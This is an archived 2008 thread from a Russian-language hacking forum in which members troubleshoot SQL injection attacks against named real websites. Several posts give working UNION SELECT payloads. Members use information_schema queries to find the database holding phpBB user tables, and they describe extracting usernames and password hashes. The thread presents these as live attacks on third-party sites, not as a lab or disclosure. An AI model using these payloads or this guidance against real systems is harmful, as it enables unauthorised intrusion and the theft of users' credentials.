ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.06.2008, 07:44
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
gisTy
очень интересно... о чем пишет данная ошибка.. а так хз. пробвал конверт. тоже самое
|
|
|
16.06.2008, 08:46
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 gisTy таблица пустая:
_http://www.women-medcenter.ru/index.phtml?id=-25999'+union+select+1,count(*)+from+user/*
|
|
|
|
16.06.2008, 11:36
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Ershik, такая ситуация неоднократно расписывалась, объяснение в чем причина и решение проблемы - http://forum.antichat.ru/showpost.php?p=497033
Последний раз редактировалось 0nep@t0p; 16.06.2008 в 11:39..
|
|
|
|
16.06.2008, 12:03
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Понял, спасибо.
Я хочу вытащить с помощью игьекции хеши из форума phpbb2.
Они вместе в одной базе данных.
Составляю запрос по типу:
http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(char(58,58),us ername,user_password),7,8,9,10,11,12+from+phpbb_us ers+limit+1,1/*
Ошибка получения информации из базы данных.Table 'gelezo2.phpbb_users' doesn't exist
Как действовать в этом случае? |
|
|
|
16.06.2008, 12:07
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
doesn't exist - не существует
Как действовать в этом случае?
Подбирай таблицу. С суфиксами пробуй.
Последний раз редактировалось .Begemot.; 16.06.2008 в 12:10..
|
|
|
|
16.06.2008, 12:39
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Я знаю, что нет.
Есть таблица phpbb_users, но нет таблицы gelezo2.phpbb_users
Мускуль 5.0.45 через лимит вытащил таблицу. Поля username и user_password вытащил.
Собрался составить запрос, чтобы вытащить данные.
Не дала, 
Последний раз редактировалось Ershik; 16.06.2008 в 12:42..
|
|
|
|
16.06.2008, 13:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Ershik
Я знаю, что нет.
Есть таблица phpbb_users, но нет таблицы gelezo2.phpbb_users
Мускуль 5.0.45 через лимит вытащил таблицу. Поля username и user_password вытащил.
Собрался составить запрос, чтобы вытащить данные.
Не дала, ну ты сам на свой вопрос и ответил. Таблицы phpbb_users именно в этой базе нет... когда вытаскивал название таблиц ... надо было ещо и table_schema глянуть а не только table_name
|
|
|
|
16.06.2008, 19:31
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
PHP код:
union+select+1,2,concat_ws(0x3a,table_name,table_schema),4,5+from+information_schema.columns+where+column_name+like+CHAR(37,112,97,115,37)+limit+0,1/*
Удобно при поиске таблиц, содержащих в себе поля в которых есть сочетание "pas"
Red sps.  |
|
|
|
16.06.2008, 21:55
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от Ershik
Составляю запрос по типу:
http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(char(58,58),us ername,user_password),7,8,9,10,11,12+from+phpbb_us ers+limit+1,1/*
я недавно с таким сталкивался.. просто таблица phpbb_users находится в другой ДБ..
собственно вот запрос:
Код:
http://saitik.ru/files.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x2e,table_schema,table_name),7,8,9,10,11,12+from+information_schema.tables+where+table_name=0x70687062625f7573657273+limit+1,1/*
так узнаем имя той ДБ, где висит табличка phpbb_users, что нам и надо, и составляем запрос на выборку из этой таблички.
|
|
|
|
18.06.2008, 01:34
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
http://darkbrotherhood.ru/index.php?charakter=&type=&p=articles&area=1&categ =&ud=&selby=&show=&pp=1'&page=1&PHPSESSID=810a244f 15bdf6a24b5889fe90dde026
Бошка не варит у мя совсем(((
подскажите
|
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Комбинированный вид